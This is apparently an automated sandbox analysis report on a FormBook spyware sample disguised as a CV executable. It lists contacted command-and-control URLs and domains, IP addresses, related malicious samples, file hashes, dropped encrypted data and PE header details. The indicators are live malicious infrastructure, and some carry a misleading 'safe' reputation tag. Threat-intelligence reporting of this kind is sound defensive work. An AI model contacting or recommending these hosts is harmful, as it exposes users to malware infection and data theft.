                                                      http://www.rtpterbaruwaktu3.xyz/mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.prhmcjdz.tokyo/cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILEtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.50food.com/u9hy/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.supernutra01.online/x1zr/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.connecty.live/6urf/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.ytsd88.top/8qt7/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.zriaraem-skiry.sbs/f8c6/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabwinver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/ac/?q=winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reg.ruwinver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icowinver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_autowinver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_landwinver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.bt.cn/?from=404winver.exe, 00000005.00000002.4527534304.0000000005398000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.00000000030A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.ecosia.org/newtab/winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.supernutra01.onlineNObNfBLfyhvzeH.exe, 00000006.00000002.4528088179.0000000004E2E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_howinver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ac.ecosia.org/autocomplete?q=winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwinver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURwinver.exe, 00000005.00000002.4527534304.0000000005074000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000002D84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690521155.000000003ED04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.reg.ru/sozdanie-saita/winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csswinver.exe, 00000005.00000002.4527534304.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003882000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://narman.com/NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003D38000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          13.248.169.48
                                                                                          www.tals.xyzUnited States
                                                                                          16509AMAZON-02USfalse
                                                                                          8.210.46.21
                                                                                          ymx01.cnSingapore
                                                                                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                          38.54.112.227
                                                                                          all.wjscdn.comUnited States
                                                                                          174COGENT-174UStrue
                                                                                          203.161.43.228
                                                                                          www.connecty.liveMalaysia
                                                                                          45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                          172.67.159.61
                                                                                          www.zriaraem-skiry.sbsUnited States
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          103.21.221.87
                                                                                          rtpterbaruwaktu3.xyzunknown
                                                                                          9905LINKNET-ID-APLinknetASNIDtrue
                                                                                          47.76.213.197
                                                                                          www.ytsd88.topUnited States
                                                                                          9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                          172.67.220.36
                                                                                          www.supernutra01.onlineUnited States
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          147.255.21.187
                                                                                          www.50food.comUnited States
                                                                                          7203LEASEWEB-USA-SFO-12UStrue
                                                                                          74.48.143.82
                                                                                          bpgroup.siteCanada
                                                                                          14663TELUS-3CAtrue
                                                                                          172.67.168.228
                                                                                          www.nmgzjwh.netUnited States
                                                                                          13335CLOUDFLARENETUStrue
                                                                                          194.58.112.174
                                                                                          www.sklad-iq.onlineRussian Federation
                                                                                          197695AS-REGRUtrue
                                                                                          13.248.221.243
                                                                                          ssl.goentri.comUnited States
                                                                                          16509AMAZON-02UStrue
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1561737
                                                                                          Start date and time:2024-11-24 08:18:16 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 55s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:CV Lic H&S Olivetti Renzo.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@15/13
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 75%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 91%
                                                                                          • Number of executed functions: 55
                                                                                          • Number of non-executed functions: 288
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          TimeTypeDescription
                                                                                          02:20:18API Interceptor10003275x Sleep call for process: winver.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          203.161.43.228CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.connecty.live/6urf/
                                                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                          • www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq
                                                                                          PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.lyxor.top/top4/
                                                                                          Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.virox.top/basq/
                                                                                          Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.quilo.life/ftr3/
                                                                                          13.248.169.48VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                                                          CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tals.xyz/cpgr/
                                                                                          Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tals.xyz/stx5/
                                                                                          Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tals.xyz/k1td/
                                                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                          • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.remedies.pro/hrap/
                                                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.optimismbank.xyz/lnyv/
                                                                                          New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.avalanchefi.xyz/ctta/
                                                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.egldfi.xyz/3e55/
                                                                                          Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.tals.xyz/010v/
                                                                                          8.210.46.21CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.prhmcjdz.tokyo/cm9a/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          all.wjscdn.comCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.90.58.209
                                                                                          www.nmgzjwh.netCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 172.67.168.228
                                                                                          www.supernutra01.onlineCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 172.67.220.36
                                                                                          Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                                          • 172.67.220.36
                                                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                          • 172.67.220.36
                                                                                          ymx01.cnCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.210.46.21
                                                                                          ssl.goentri.comCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 76.223.74.74
                                                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • 76.223.74.74
                                                                                          Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                          • 76.223.74.74
                                                                                          www.zriaraem-skiry.sbsCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 104.21.42.77
                                                                                          www.50food.comCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 147.255.21.187
                                                                                          www.sklad-iq.onlineCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 194.58.112.174
                                                                                          Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                          • 194.58.112.174
                                                                                          www.connecty.liveCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 203.161.43.228
                                                                                          DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                          • 203.161.43.228
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          VNPT-AS-VNVNPTCorpVNCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 203.161.43.228
                                                                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 14.249.184.119
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 123.28.58.156
                                                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 14.188.157.232
                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 113.164.17.185
                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 14.249.184.121
                                                                                          m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 113.163.190.100
                                                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 14.172.55.92
                                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 113.189.219.236
                                                                                          sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                          • 123.31.16.51
                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.210.46.21
                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 47.253.2.162
                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 8.215.199.92
                                                                                          yakuza.sh.elfGet hashmaliciousMiraiBrowse
                                                                                          • 8.216.26.127
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 47.253.41.50
                                                                                          PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.210.114.150
                                                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.210.114.150
                                                                                          payments.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.210.114.150
                                                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                                                          • 47.244.139.234
                                                                                          Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                          • 8.210.144.166
                                                                                          AMAZON-02USVSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                          • 13.248.169.48
                                                                                          CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                          • 76.223.74.74
                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 3.122.148.244
                                                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 13.223.155.145
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 18.243.54.8
                                                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 15.206.178.249
                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 3.99.230.17
                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 3.167.69.129
                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 35.74.17.116
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 54.126.105.86
                                                                                          COGENT-174USTAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                          • 206.119.82.148
                                                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.23.184.194
                                                                                          arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 204.77.18.147
                                                                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.24.59.144
                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.200.234.198
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.85.133.234
                                                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.251.1.250
                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.116.131.10
                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.134.93.88
                                                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 38.255.28.227
                                                                                          No context
                                                                                          No context
                                                                                          Process:C:\Windows\SysWOW64\winver.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):288256
                                                                                          Entropy (8bit):7.993957307360091
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:376OFozMzrfpHwYpRR5JIe2gs1pTDpeDs303MC4PVhfB:Ogw0lQYFIe2p1pgrMC4Nj
                                                                                          MD5:4B996FECAC02FBCDB531E19B51664774
                                                                                          SHA1:8ABB5D909B28E231611C2F18C8D8409A8174FFC1
                                                                                          SHA-256:69E0A9A7B089C5B271AF8C5FB6A0236800D952CCA15A1B9433EF12AC03AB8E9D
                                                                                          SHA-512:9E0F10B2FB5DC207AAEAA640684AE124AB396B462E457508E4E2E1E38BB17CEAF750C53C297170B495061213735CE2B905A7170DE3FD2E96EBFEF395B9ADA520
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...B2TEL06CS..B1.EL46CSJ.B1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1.EL48\.DZ.8.d.5z.r.2+Bt5>[Q12'z!P:+#@.!6j(7_t,".r..j7-U1kA9<gSJZB1TE55?.n*=..4"..V$.P...n%+.,...f"V._...3-..X7-qTQ.SJZB1TELdsCS.[C1(..h6CSJZB1T.L67HRAZBePEL46CSJZB.AEL4&CSJ*F1TE.46SSJZ@1TCL46CSJZD1TEL46CS:^B1VEL46CSHZ..TE\46SSJZB!TE\46CSJZR1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZlE1=846C..^B1DEL4bGSJJB1TEL46CSJZB1TeL4VCSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46
                                                                                          Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):288256
                                                                                          Entropy (8bit):7.993957307360091
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:376OFozMzrfpHwYpRR5JIe2gs1pTDpeDs303MC4PVhfB:Ogw0lQYFIe2p1pgrMC4Nj
                                                                                          MD5:4B996FECAC02FBCDB531E19B51664774
                                                                                          SHA1:8ABB5D909B28E231611C2F18C8D8409A8174FFC1
                                                                                          SHA-256:69E0A9A7B089C5B271AF8C5FB6A0236800D952CCA15A1B9433EF12AC03AB8E9D
                                                                                          SHA-512:9E0F10B2FB5DC207AAEAA640684AE124AB396B462E457508E4E2E1E38BB17CEAF750C53C297170B495061213735CE2B905A7170DE3FD2E96EBFEF395B9ADA520
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...B2TEL06CS..B1.EL46CSJ.B1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1.EL48\.DZ.8.d.5z.r.2+Bt5>[Q12'z!P:+#@.!6j(7_t,".r..j7-U1kA9<gSJZB1TE55?.n*=..4"..V$.P...n%+.,...f"V._...3-..X7-qTQ.SJZB1TELdsCS.[C1(..h6CSJZB1T.L67HRAZBePEL46CSJZB.AEL4&CSJ*F1TE.46SSJZ@1TCL46CSJZD1TEL46CS:^B1VEL46CSHZ..TE\46SSJZB!TE\46CSJZR1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZlE1=846C..^B1DEL4bGSJJB1TEL46CSJZB1TeL4VCSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46CSJZB1TEL46
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.139542083322144
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:CV Lic H&S Olivetti Renzo.exe
                                                                                          File size:1'207'296 bytes
                                                                                          MD5:12a282dc358949660691fbff8bcdf461
                                                                                          SHA1:c425cd4b512501453ec8f08f98983e5e02c6c614
                                                                                          SHA256:7ab6840afe0f8992a491db388b5225eea0ab7bad3a76be681e3344776070ce4d
                                                                                          SHA512:b1668ddd51a18a7bc6fc20ebc0ed163ed7186bb32c865e48e3fa741a9e9cb8811f2195701993ec6a4c4a7b1cc5adbddd76e81817be44752614c2608adf532b8a
                                                                                          SSDEEP:24576:0tb20pkaCqT5TBWgNQ7acBSzrMo1SJpmSpXl6A:dVg5tQ7acB4B0pLp15
                                                                                          TLSH:B545C01273DE8361C3B25273BA25B741BEBB782506B1F56B2FD4093DE920162521EB73
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                          Icon Hash:aaf3e3e3938382a0
                                                                                          Entrypoint:0x425f74
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x673F2132 [Thu Nov 21 12:01:54 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                          Instruction
                                                                                          call 00007F6F286F41DFh
                                                                                          jmp 00007F6F286E71F4h
